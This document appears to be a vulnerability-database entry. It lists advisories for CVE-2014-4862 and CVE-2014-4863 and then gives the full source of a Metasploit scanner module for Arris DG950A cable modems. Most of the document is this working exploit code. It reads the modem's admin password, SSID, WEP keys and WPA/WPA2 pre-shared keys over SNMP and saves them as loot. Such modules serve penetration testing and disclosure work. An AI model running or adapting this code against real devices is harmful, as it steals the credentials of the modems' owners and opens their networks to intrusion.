| Title | Published | Views | Family |
|---|---|---|---|
| ARRIS Touchstone DG950A SNMP Information Disclosure (CVE-2014-4863) | 7 Nov 2014 00:00 | – | nessus |
| CVE-2014-4863 | 29 May 2018 15:50 | – | circl |
| CVE-2014-4862 | 5 Sep 2014 17:00 | – | cve |
| CVE-2014-4863 | 5 Sep 2014 17:00 | – | cve |
| CVE-2014-4862 | 5 Sep 2014 17:00 | – | cvelist |
| CVE-2014-4863 | 5 Sep 2014 17:00 | – | cvelist |
| Arris DG950A Cable Modem Wifi Enumeration | 8 Sep 2014 15:04 | – | metasploit |
| CVE-2014-4862 | 5 Sep 2014 17:55 | – | nvd |
| CVE-2014-4863 | 5 Sep 2014 17:55 | – | nvd |
| Report default community names of the SNMP Agent | 12 Mar 2014 00:00 | – | openvas |

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Arris DG950A Cable Modem Wifi Enumeration',
      'Description' => %q{
        This module will extract WEP keys and WPA preshared keys from
        Arris DG950A cable modems.
      },
      'References' =>
        [
          ['CVE','2014-4863'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863/']
        ],
      'Author' => ['Deral "Percent_X" Heiland'],
      'License' => MSF_LICENSE
    )
  end

  def run_host(ip)
    snmp = connect_snmp

    if snmp.get_value('sysDescr.0') =~ /DG950A/
      print_line("#{ip}")
      # System Admin Password
      wifi_info = ''
      password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
      print_line("Password: #{password}")
      wifi_info << "Password: #{password}" << "\n"
    else
      fail_with(Failure::NoTarget, "Does not appear to be an Arris DG950A")
    end

    # check WPA Encryption Algorithm
    encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')
    case encrypt_type
    when 1
      wpa_encrypt = "TKIP"
    when 2
      wpa_encrypt = "AES"
    when 3
      wpa_encrypt = "TKIP/AES"
    else
      wpa_encrypt = "Unknown"
    end

    # Wifi Status
    wifi_status = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
    if wifi_status == '1'
      ssid = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.2.12')
      print_line("SSID: #{ssid}")
      wifi_info << "SSID: #{ssid}" << "\n"

      # Wifi Security Settings
      wifi_version = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')
      if wifi_version == '0'
        print_line('Open Access Wifi is Enabled')
        wifi_info << 'Open Access WIFI is Enabled' << "\n"

      # WEP enabled
      elsif wifi_version == '1'
        wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')
        case wep_type
        when 1
          oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"
        when 2
          oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"
        else
          print_line('FAILED')
        end
        wepkey1 = snmp.get_value("#{oid}.1")
        key1 = "#{wepkey1}"
        print_line("WEP KEY1: #{key1}")
        wifi_info << "WEP KEY1: #{key1}" << "\n"
        wepkey2 = snmp.get_value("#{oid}.2")
        key2 = "#{wepkey2}"
        print_line("WEP KEY2: #{key2}")
        wifi_info << "WEP KEY2: #{key2}" << "\n"
        wepkey3 = snmp.get_value("#{oid}.3")
        key3 = "#{wepkey3}"
        print_line("WEP KEY3: #{key3}")
        wifi_info << "WEP KEY3: #{key3}" << "\n"
        wepkey4 = snmp.get_value("#{oid}.4")
        key4 = "#{wepkey4}"
        print_line("WEP KEY4: #{key4}")
        wifi_info << "WEP KEY4: #{key4}" << "\n"

      # WPA enabled
      elsif wifi_version == '2'
        wpapsk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
        print_line("WPA PSK: #{wpapsk}")
        print_line("WPA Encryption: #{wpa_encrypt}")
        wifi_info << "WPA PSK: #{wpapsk}" << "\n"
        wifi_info << "WPA Encryption #{wpa_encrypt}" << "\n"

      # WPA2 enabled
      elsif wifi_version == '3'
        wpapsk2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
        print_line("WPA2 PSK: #{wpapsk2}")
        print_line("WPA2 Encryption: #{wpa_encrypt}")
        wifi_info << "WPA2 PSK: #{wpapsk2}" << "\n"
        wifi_info << "WPA2 Encryption: #{wpa_encrypt}" << "\n"

      # WPA/WPA2 enabled
      elsif wifi_version == '7'
        wpawpa2psk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
        print_line("WPA/WPA2 PSK: #{wpawpa2psk}")
        print_line("WPA/WPA2 Encryption: #{wpa_encrypt}")
        wifi_info << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"
        wifi_info << "WPA/WPA2 Encryption: #{wpa_encrypt}" << "\n"
      else
        print_line('FAILED')
      end
    else
      print_line('WIFI is not enabled')
    end

    # Woot we got loot.
    loot_name = 'arris_wifi'
    loot_type = 'text/plain'
    loot_filename = 'arris_wifi.text'
    loot_desc = 'Arris DG950A Wifi configuration data'
    p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)
    print_good("WiFi Data saved in: #{p}")

  # No need to make noise
  rescue ::SNMP::UnsupportedVersion
  rescue ::SNMP::RequestTimeout
    raise $ERROR_INFO
  rescue ::Exception => e
    print_error("#{ip} error: #{e.class} #{e.message}")
    disconnect_snmp
  end
end
```